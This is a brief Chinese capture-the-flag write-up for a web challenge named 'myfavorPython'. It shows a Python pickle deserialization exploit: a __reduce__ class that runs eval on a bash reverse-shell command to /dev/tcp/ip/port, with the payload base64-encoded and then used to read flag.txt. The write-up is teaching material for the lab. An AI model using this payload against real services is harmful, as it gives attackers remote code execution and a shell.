一、题目
题目:myfavorPython
题目描述:
二、WriteUp
1. 功能探测
访问http://127.0.0.1:5000/register
成功注册后
2. 思路:将序列化的字节流base64编码
import pickle
import os
import base64
import pickletools
cmd = "__import__(\"os\").popen('bash -c \"/bin/bash -i >& /dev/tcp/ip/port 0>&1\"').read()"
class A(object):
def __reduce__(self):
return (eval,(cmd,))
a=A()
b=pickle.dumps(a)
print(base64.b64encode(b))
pickletools.dis(b)
3. 拿到shell后直接cat flag.txt
三、总结
1. python反序列化学习参考链接
https://blog.csdn.net/weixin_62808713/article/details/130048382